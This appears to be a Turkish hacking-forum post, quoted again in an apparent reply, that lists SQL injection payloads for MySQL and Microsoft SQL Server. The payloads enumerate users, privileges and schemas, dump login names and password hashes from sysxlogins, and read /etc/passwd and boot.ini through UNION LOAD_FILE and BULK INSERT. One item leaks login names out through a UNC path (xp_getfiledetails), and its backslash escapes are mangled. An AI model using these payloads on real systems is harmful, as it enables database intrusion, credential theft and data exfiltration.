SaMuRai
Emektar
~MySQL Injection Codes / Püf NoktalarıSystem User’ı Göstermek > SELECT system_user();
MySQL Userlarını Göstermek > SELECT user FROM mysql.user; -- priv Bi Koddur (H).
İzinleri Göstermek > SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
DBLeri Listeletmek > SELECT schema_name FROM information_schema.schemata;
Colonları Listeletmek > SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ’mysql’ AND table_schema != ’information_schema’
Tabloları Listeltmek > SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ’mysql’ AND table_schema != ’information_schema’
Dosya Okumak > UNION ALL SELECT LOAD_FILE(’/etc/passwd’) -privdi publci oldu
~MsSQL Injection Codes / Püf Noktaları
userları listeletmek > SELECT name FROM master..syslogins
şifre saltlarını listeletmek > SELECT name, password FROM master..sysxlogins
Current Userın admin olup olmadıgını Gösterir ( 1 ise admin 0 ise değil) > SELECT is_srvrolemember(’sysadmin’);
DbLeri Listeletmek > SELECT name FROM master..sysdatabases;
Colonları Listeletmek > SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’so****ble’;
Tabloları Listeletmek > SELECT name FROM master..sysobjects WHERE xtype = ’U’;
DNS ISTEMCISI YARATMAK (Priv8) > declare @host varchar(800); select @host = name FROM master..syslogins; exec(’master..xp_getfiledetails ’’\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\’ + @host + ’\\\\\\\\\\\\\\\\c$\\\\\\\\\\\\\\\\boot.ini’’ ’);
Local File acces Yapmak > CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM ’c:\\\\\\\\\\\\\\\\boot.ini’;
DROP TABLE mydata;
Hostname-ip adress öğrenemek > SELECT HOST_NAME()
MySQL Userlarını Göstermek > SELECT user FROM mysql.user; -- priv Bi Koddur (H).
İzinleri Göstermek > SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
DBLeri Listeletmek > SELECT schema_name FROM information_schema.schemata;
Colonları Listeletmek > SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ’mysql’ AND table_schema != ’information_schema’
Tabloları Listeltmek > SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ’mysql’ AND table_schema != ’information_schema’
Dosya Okumak > UNION ALL SELECT LOAD_FILE(’/etc/passwd’) -privdi publci oldu
~MsSQL Injection Codes / Püf Noktaları
userları listeletmek > SELECT name FROM master..syslogins
şifre saltlarını listeletmek > SELECT name, password FROM master..sysxlogins
Current Userın admin olup olmadıgını Gösterir ( 1 ise admin 0 ise değil) > SELECT is_srvrolemember(’sysadmin’);
DbLeri Listeletmek > SELECT name FROM master..sysdatabases;
Colonları Listeletmek > SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’so****ble’;
Tabloları Listeletmek > SELECT name FROM master..sysobjects WHERE xtype = ’U’;
DNS ISTEMCISI YARATMAK (Priv8) > declare @host varchar(800); select @host = name FROM master..syslogins; exec(’master..xp_getfiledetails ’’\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\’ + @host + ’\\\\\\\\\\\\\\\\c$\\\\\\\\\\\\\\\\boot.ini’’ ’);
Local File acces Yapmak > CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM ’c:\\\\\\\\\\\\\\\\boot.ini’;
DROP TABLE mydata;
Hostname-ip adress öğrenemek > SELECT HOST_NAME()
ama yinede güzel paylaşım